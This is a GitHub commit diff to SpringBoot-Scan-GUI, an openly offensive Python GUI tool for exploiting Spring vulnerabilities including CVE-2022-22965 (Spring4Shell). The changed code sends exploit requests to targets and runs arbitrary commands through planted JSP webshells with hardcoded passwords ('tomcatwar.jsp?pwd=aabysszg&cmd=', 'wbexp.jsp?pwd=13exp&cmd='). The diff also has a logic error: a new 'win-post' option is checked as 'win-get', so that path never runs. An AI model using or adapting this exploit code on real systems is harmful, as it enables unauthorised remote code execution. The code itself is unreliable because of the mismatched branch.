Skip to content

Commit f2c4f53

Browse files
authored
Add files via upload
1 parent f9f3b89 commit f2c4f53

File tree

2 files changed

+17
-13
lines changed

2 files changed

+17
-13
lines changed

SpringBoot-Scan-GUI-Linux.py

Lines changed: 9 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -28,7 +28,7 @@ def __init__(self):
2828
\$$ \$$$$$$
2929
______
3030
/ \
31-
| $$$$$$\ _______ ______ _______ SpringBootScan-GUI Version: 1.2
31+
| $$$$$$\ _______ ______ _______ SpringBootScan-GUI Version: 1.2.1
3232
| $$___\$$ / \| \ | \ +----------------------------------+
3333
\$$ \ | $$$$$$$ \$$$$$$\| $$$$$$$\ + 图形化 by: →13exp← +
3434
_\$$$$$$\| $$ / $$| $$ | $$ + https://github.com/13exp/ +
@@ -46,7 +46,7 @@ def __init__(self):
4646
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
4747
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0",
4848
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00")
49-
cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-13exp-shell","22965-aabyss-shell-post","22965-aabyss-shell-get")
49+
cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-13exp-shell","22965-aabyss-linux-post","22965-aabyss-win-post","22965-aabyss-shell-get")
5050
no_proxies = []
5151
proxy_list = []
5252
self.root = tk.Tk()
@@ -677,18 +677,20 @@ def CVE_2022_22965_aabysszg(self, url, proxies):
677677
try:
678678
requests.packages.urllib3.disable_warnings()
679679
if proxies != "":
680-
if Vule == "22965-aabyss-shell-post":
680+
if Vule == "22965-aabyss-linux-post":
681681
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
682682
sleep(1)
683+
elif Vule == "22965-aabyss-win-get":
683684
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
684685
sleep(1)
685686
elif Vule == "22965-aabyss-shell-get":
686687
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
687688
sleep(1)
688689
else:
689-
if Vule == "22965-aabyss-shell-post":
690+
if Vule == "22965-aabyss-linux-post":
690691
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False)
691692
sleep(1)
693+
elif Vule == "22965-aabyss-win-get":
692694
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False)
693695
sleep(1)
694696
elif Vule == "22965-aabyss-shell-get":
@@ -838,7 +840,7 @@ def cve_2022_22965_exec(self):
838840
cmd = self.reverse_tcp.get()
839841
if self.CVEs.get() == 'CVE-2022-22965':
840842
url_shell = url + "shell.jsp?cmd={}".format(cmd)
841-
elif '22965-aabyss-shell' in self.CVEs.get():
843+
elif '22965-aabyss' in self.CVEs.get():
842844
url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}".format(cmd)
843845
elif self.CVEs.get() == '22965-13exp-shell':
844846
url_shell = url + "wbexp.jsp?pwd=13exp&cmd={}".format(cmd)
@@ -1034,7 +1036,7 @@ def Vule(self):
10341036
self.CVE_2022_22963(i, proxies,execcmd)
10351037
elif Vule == "CVE-2022-22947":
10361038
self.CVE_2022_22947(i, proxies,execcmd)
1037-
elif "22965-aabyss-shell" in Vule:
1039+
elif "22965-aabyss" in Vule:
10381040
self.CVE_2022_22965_aabysszg(i, proxies)
10391041

10401042
else:
@@ -1056,7 +1058,7 @@ def Vule(self):
10561058
messagebox.showinfo("提示","执行命令不能为空,请重试!")
10571059
else:
10581060
self.CVE_2022_22947(url, proxies,execcmd)
1059-
elif "22965-aabyss-shell" in Vule:
1061+
elif "22965-aabyss" in Vule:
10601062
back = self.CVE_2022_22965_aabysszg(url, proxies)
10611063
if "[-]" in back:
10621064
back = "[+]执行二次验证中 等待5秒"

SpringBoot-Scan-GUI.py

Lines changed: 8 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -46,7 +46,7 @@ def __init__(self):
4646
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
4747
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0",
4848
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00")
49-
cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-13exp-shell","22965-aabyss-shell-post","22965-aabyss-shell-get")
49+
cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-13exp-shell","22965-aabyss-linux-post","22965-aabyss-win-post","22965-aabyss-shell-get")
5050
no_proxies = []
5151
proxy_list = []
5252
self.root = tk.Tk()
@@ -677,18 +677,20 @@ def CVE_2022_22965_aabysszg(self, url, proxies):
677677
try:
678678
requests.packages.urllib3.disable_warnings()
679679
if proxies != "":
680-
if Vule == "22965-aabyss-shell-post":
680+
if Vule == "22965-aabyss-linux-post":
681681
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
682682
sleep(1)
683+
elif Vule == "22965-aabyss-win-get":
683684
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
684685
sleep(1)
685686
elif Vule == "22965-aabyss-shell-get":
686687
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
687688
sleep(1)
688689
else:
689-
if Vule == "22965-aabyss-shell-post":
690+
if Vule == "22965-aabyss-linux-post":
690691
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False)
691692
sleep(1)
693+
elif Vule == "22965-aabyss-win-get":
692694
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False)
693695
sleep(1)
694696
elif Vule == "22965-aabyss-shell-get":
@@ -838,7 +840,7 @@ def cve_2022_22965_exec(self):
838840
cmd = self.reverse_tcp.get()
839841
if self.CVEs.get() == 'CVE-2022-22965':
840842
url_shell = url + "shell.jsp?cmd={}".format(cmd)
841-
elif '22965-aabyss-shell' in self.CVEs.get():
843+
elif '22965-aabyss' in self.CVEs.get():
842844
url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}".format(cmd)
843845
elif self.CVEs.get() == '22965-13exp-shell':
844846
url_shell = url + "wbexp.jsp?pwd=13exp&cmd={}".format(cmd)
@@ -1034,7 +1036,7 @@ def Vule(self):
10341036
self.CVE_2022_22963(i, proxies,execcmd)
10351037
elif Vule == "CVE-2022-22947":
10361038
self.CVE_2022_22947(i, proxies,execcmd)
1037-
elif "22965-aabyss-shell" in Vule:
1039+
elif "22965-aabyss" in Vule:
10381040
self.CVE_2022_22965_aabysszg(i, proxies)
10391041

10401042
else:
@@ -1056,7 +1058,7 @@ def Vule(self):
10561058
messagebox.showinfo("提示","执行命令不能为空,请重试!")
10571059
else:
10581060
self.CVE_2022_22947(url, proxies,execcmd)
1059-
elif "22965-aabyss-shell" in Vule:
1061+
elif "22965-aabyss" in Vule:
10601062
back = self.CVE_2022_22965_aabysszg(url, proxies)
10611063
if "[-]" in back:
10621064
back = "[+]执行二次验证中 等待5秒"

0 commit comments

Comments
 (0)